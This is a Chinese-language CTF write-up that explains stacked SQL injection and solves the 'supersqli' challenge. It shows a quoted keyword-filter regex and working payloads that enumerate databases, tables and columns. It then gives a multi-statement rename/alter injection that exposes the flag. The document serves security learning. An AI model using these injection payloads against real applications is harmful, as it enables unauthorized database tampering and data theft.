渗透测试-SQL注入之堆叠注入-攻防世界supersqli实战

1.堆叠注入原理

平常我们注入时都是通过对原来sql语句传输数据的地方进行相关修改，注入情况会因为该语句本身的情况而受到相关限制，例如一个select语句，那么我们注入时也只能执行select操作，无法进行增、删、改，其他语句也同理，所以可以说我们能够注入的十分有限。

但堆叠注入则完全打破了这种限制，其名字顾名思义，就是可以堆一堆sql注入进行注入，这个时候我们就不受前面语句的限制可以为所欲为了。其原理也很简单，就是将原来的语句构造完后加上分号，代表该语句结束，后面在输入的就是一个全新的sql语句了，这个时候我们使用增删查改毫无限制。

2.堆叠注入使用方法

在SQL中，分号（;）是用来表示一条sql语句的结束。在 ; 结束一个sql语句后继续构造下一条语句，就造成了堆叠注入。

3.堆叠注入的局限性

PHP页面调用sql语句时用的是mysqli_multi_query()函数，此时可以使用堆叠注入，如图：

       堆叠注入的使用条件十分有限，只有当调用数据库函数支持执行多条sql语句时才能够使用，利用mysqli_multi_query()函数就支持多条sql语句同时执行，但实际情况中，如PHP为了防止sql注入机制，往往使用调用数据库的函数是mysqli_ query()函数，其只能执行一条语句，分号后面的内容将不会被执行。

4.攻防世界supersqli实战(堆叠注入)

题目如下

先添加一个单引号，报错，错误信息如下：

error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1

接着测试--+注释，发现被过滤，然后使用#注释，可行 用order by语句判断出有两个字段，接着使用union select 爆字段，发现这个时候出现了如下提示：

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

发现上面的关键字都被过滤不能使用了，没法进行注入，这个时候尝试一下堆叠注入

现在回到这道题，利用堆叠注入，查询所有数据库：

1';show databases;#

查询所有表:

1';show tables;#

查询words表中所有列:

1';show columns from words;#

查询1919810931114514表中所有列

1';show columns from `1919810931114514`;#      (字符串为表名操作时要加反引号)

找到了flag的的列，下一步就是如何让他回显出来

上图，我们知道正则匹配过滤了很多字符，但是没有过滤alert和rename

①先把words表改为word1

②再利用rename将1919810931114514这个表修改为word

③再将flag字段修改成id

1';
rename tables `words` to `words1`;
rename tables `1919810931114514` to `words`; 
alter table `words` change `flag` `id` varchar(100);#

 这段代码的意思是将words表名改为words1，1919810931114514表名改为words，将现在的words表中的flag列名改为id 然后用1' or 1=1 #得到flag